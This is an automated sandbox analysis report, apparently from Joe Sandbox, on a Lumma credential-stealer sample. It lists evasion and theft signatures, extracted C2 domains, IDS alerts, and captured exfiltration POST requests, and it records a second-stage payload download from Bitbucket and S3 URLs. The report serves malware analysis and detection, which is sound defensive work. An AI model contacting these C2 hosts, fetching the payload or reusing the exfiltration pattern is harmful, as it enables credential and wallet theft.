Windows Analysis Report
mG83m82qhF.exe

Overview

General Information

Sample name: mG83m82qhF.exe (renamed because original name is a hash value)
Original sample name: b51d856b18ecfad7b127881f7819409b.exe
Analysis ID: 1579750
MD5: b51d856b18ecfad7b127881f7819409b
SHA1: 61365a9f474ed89cc6bcc45bd08355a381cacb85
SHA256: 663a74437e86b0bf7008ac4438821bf6c2adc65abf946b81014649a2fc23d294
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • mG83m82qhF.exe (PID: 7704 cmdline: "C:\Users\user\Desktop\mG83m82qhF.exe" MD5: B51D856B18ECFAD7B127881F7819409B)
    • WerFault.exe (PID: 1472 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7704 -s 2040 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["steppriflej.xyz", "supporse-comment.cyou", "hosue-billowy.cyou", "smash-boiling.cyou", "sendypaster.xyz", "pollution-raker.cyou", "cuddlyready.xyz", "greywe-snotty.cyou", "ripe-blade.cyou"], "Build id": "LOGS11--LiveTraffic"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000000.00000003.1426197522.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1455318191.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1454724980.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1456122443.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1452173526.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T08:31:24.358092+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49709 | 172.67.150.173 | 443 | TCP
2024-12-23T08:31:26.603782+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49715 | 172.67.150.173 | 443 | TCP
2024-12-23T08:31:29.217430+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49721 | 172.67.150.173 | 443 | TCP
2024-12-23T08:31:31.800217+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49727 | 172.67.150.173 | 443 | TCP
2024-12-23T08:31:34.383974+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49733 | 172.67.150.173 | 443 | TCP
2024-12-23T08:31:37.289695+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49741 | 172.67.150.173 | 443 | TCP
2024-12-23T08:31:39.873395+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49752 | 172.67.150.173 | 443 | TCP
2024-12-23T08:31:45.261319+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49763 | 172.67.150.173 | 443 | TCP
2024-12-23T08:31:47.601922+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49769 | 185.166.143.49 | 443 | TCP
2024-12-23T08:31:50.046654+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49775 | 52.217.136.89 | 443 | TCP
2024-12-23T08:31:25.370653+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49709 | 172.67.150.173 | 443 | TCP
2024-12-23T08:31:27.384459+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49715 | 172.67.150.173 | 443 | TCP
2024-12-23T08:31:46.020963+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49763 | 172.67.150.173 | 443 | TCP
2024-12-23T08:31:25.370653+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.10 | 49709 | 172.67.150.173 | 443 | TCP
2024-12-23T08:31:27.384459+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.10 | 49715 | 172.67.150.173 | 443 | TCP
2024-12-23T08:31:38.056395+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49741 | 172.67.150.173 | 443 | TCP

                AV Detection

                Source: mG83m82qhF.exe, Avira: detected
                Source: mG83m82qhF.exe.7704.0.memstrmin, Malware Configuration Extractor: LummaC {"C2 url": ["steppriflej.xyz", "supporse-comment.cyou", "hosue-billowy.cyou", "smash-boiling.cyou", "sendypaster.xyz", "pollution-raker.cyou", "cuddlyready.xyz", "greywe-snotty.cyou", "ripe-blade.cyou"], "Build id": "LOGS11--LiveTraffic"}
                Source: mG83m82qhF.exe, Virustotal: Detection: 54%
                Source: mG83m82qhF.exe, ReversingLabs: Detection: 63%
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: mG83m82qhF.exe, Joe Sandbox ML: detected
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmp, String decryptor: pollution-raker.cyou
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmp, String decryptor: hosue-billowy.cyou
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmp, String decryptor: ripe-blade.cyou
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmp, String decryptor: smash-boiling.cyou
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmp, String decryptor: supporse-comment.cyou
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmp, String decryptor: greywe-snotty.cyou
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmp, String decryptor: steppriflej.xyz
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmp, String decryptor: sendypaster.xyz
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmp, String decryptor: cuddlyready.xyz
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmp, String decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmp, String decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmp, String decryptor: - Screen Resoluton:
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmp, String decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmp, String decryptor: Workgroup: -
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmp, String decryptor: LOGS11--LiveTraffic
                Source: mG83m82qhF.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknown, HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49709 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49715 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49721 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49727 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49733 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49741 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49752 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49763 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.10:49769 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 52.217.136.89:443 -> 192.168.2.10:49775 version: TLS 1.2
                Source: C:\Users\user\Desktop\mG83m82qhF.exe, Directory queried: number of queries: 1001

                Networking

                Source: Network traffic, Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2: 192.168.2.10:49715 -> 172.67.150.173:443
                Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin: 192.168.2.10:49715 -> 172.67.150.173:443
                Source: Network traffic, Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration: 192.168.2.10:49741 -> 172.67.150.173:443
                Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity: 192.168.2.10:49709 -> 172.67.150.173:443
                Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin: 192.168.2.10:49709 -> 172.67.150.173:443
                Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin: 192.168.2.10:49763 -> 172.67.150.173:443
                Source: Malware configuration extractor, URLs: steppriflej.xyz
                Source: Malware configuration extractor, URLs: supporse-comment.cyou
                Source: Malware configuration extractor, URLs: hosue-billowy.cyou
                Source: Malware configuration extractor, URLs: smash-boiling.cyou
                Source: Malware configuration extractor, URLs: sendypaster.xyz
                Source: Malware configuration extractor, URLs: pollution-raker.cyou
                Source: Malware configuration extractor, URLs: cuddlyready.xyz
                Source: Malware configuration extractor, URLs: greywe-snotty.cyou
                Source: Malware configuration extractor, URLs: ripe-blade.cyou
                Source: DNS query: cuddlyready.xyz
                Source: Joe Sandbox View, IP Address: 172.67.150.173
                Source: Joe Sandbox View, IP Address: 185.166.143.49
                Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.10:49709 -> 172.67.150.173:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.10:49733 -> 172.67.150.173:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.10:49727 -> 172.67.150.173:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.10:49715 -> 172.67.150.173:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.10:49741 -> 172.67.150.173:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.10:49769 -> 185.166.143.49:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.10:49775 -> 52.217.136.89:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.10:49721 -> 172.67.150.173:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.10:49763 -> 172.67.150.173:443
                Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.10:49752 -> 172.67.150.173:443
                Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: cuddlyready.xyz
                Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 53
                    Host: cuddlyready.xyz
                Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=K9DFO6OSNV4Y2XTIIPM
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 12859
                    Host: cuddlyready.xyz
                Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=2NP6G25QLXUCTB6
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 15062
                    Host: cuddlyready.xyz
                Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=O1N2OO66DWA6
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 20406
                    Host: cuddlyready.xyz
                Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=ZZ2FAQATDR3FX5
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 1246
                    Host: cuddlyready.xyz
                Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=DDNDLNQIKL
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 571289
                    Host: cuddlyready.xyz
                Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 88
                    Host: cuddlyready.xyz
                Source: global traffic, HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNMBRFAF7J&Signature=ElXwI1uM9Ngc%2BxuaSBlHwwNoUyU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJGMEQCIHFOadXW96s%2F6j%2B9%2F1qDLQ%2FVQjzT09CNZEl0KSalnReRAiAVIR6CkmJv752IfTGhHrBu8MVl8HXgzVXeJarf7U6uNSqwAgjQ%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMf3beE4TDGTWAxXf7KoQCCIVDIy89MY1SXcPhKyZL9lBg2pPZBxGCmrKICNGJ6h%2FheqsMKqBW6WUKyqApzTtXVRvVE3dkKIriK7OXdMRoJA1PBz6Y%2F0ZILj1MBXZfy4lo4f61H1yCCnaEG%2Fh3DETN5htpaDQpLxXWVQJDJzKFObJg08IFnpVPlJsXAqMn5fWRZiWzPmaYZTjgi%2BXeY8QwxS1jq%2FTwH6nzn0tPIh68O5rH%2Bg66d%2BvvxT7oS3fmc1Ql1PauHEt5IvtcYVMLd4gFlgEfHROLI%2BSx8Ci0F%2Fod3LbBg6KjtMraiqskzv135yY7nh4blgqoJis6ekwpCZAv3MjVYedHhTOMz9L%2BNtqonsiE6H0wkJ%2BkuwY6ngGK60xTwJ8GaP00JfvV8zmzgbazl0vd1R%2FI8BE8GI%2FQizEzV1tvLyuVn8O%2Bjv3TQy2op987XWou94jMnJQS46uxs8Ju0vMuJyGP%2Fm9Pv%2B9rjrr05WMtHqBeTOTzNjsGoj1w1XCAbwY%2BnCJke6mWUvmJDQV3UNFoIj5wrOU9N8KG52Lv2DH29Pc9SsXP5V94voMaRUXiGGyyEAt59t0%2B4Q%3D%3D&Expires=1734940312 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic, DNS traffic detected: DNS query: cuddlyready.xyz
                Source: global traffic, DNS traffic detected: DNS query: bitbucket.org
                Source: global traffic, DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                Source: unknown, HTTP traffic detected: POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: cuddlyready.xyz
                Source: mG83m82qhF.exe, 00000000.00000003.1630581541.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1630535859.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005907847.0000000000B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/b=
                Source: mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: mG83m82qhF.exe, 00000000.00000002.2005363639.000000000081B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
                Source: mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe1
                Source: mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: mG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
                Source: mG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
                Source: mG83m82qhF.exe, 00000000.00000003.1609775563.00000000052A4000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2008127945.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609568689.000000000529F000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: mG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
                Source: mG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: mG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1372699843.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1427610130.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1426240498.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1477221056.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1478333037.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/
                Source: mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1630535859.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/2=C
                Source: mG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453035473.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453162697.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453850480.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453566886.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454050433.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1452841763.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/=I
                Source: mG83m82qhF.exe, 00000000.00000003.1372699843.0000000000A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/DA
                Source: mG83m82qhF.exe, 00000000.00000003.1372699843.0000000000AAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/I
                Source: mG83m82qhF.exe, 00000000.00000003.1426197522.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1427610130.0000000000B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/RD
                Source: mG83m82qhF.exe, 00000000.00000003.1426197522.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1427610130.0000000000B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/Use
                Source: mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1630535859.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1495608790.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/Win
                Source: mG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1557063908.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1556926556.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1495608790.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1426197522.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1372699843.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1426240498.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1477122557.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1556895579.0000000000B14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/api
                Source: mG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apiit
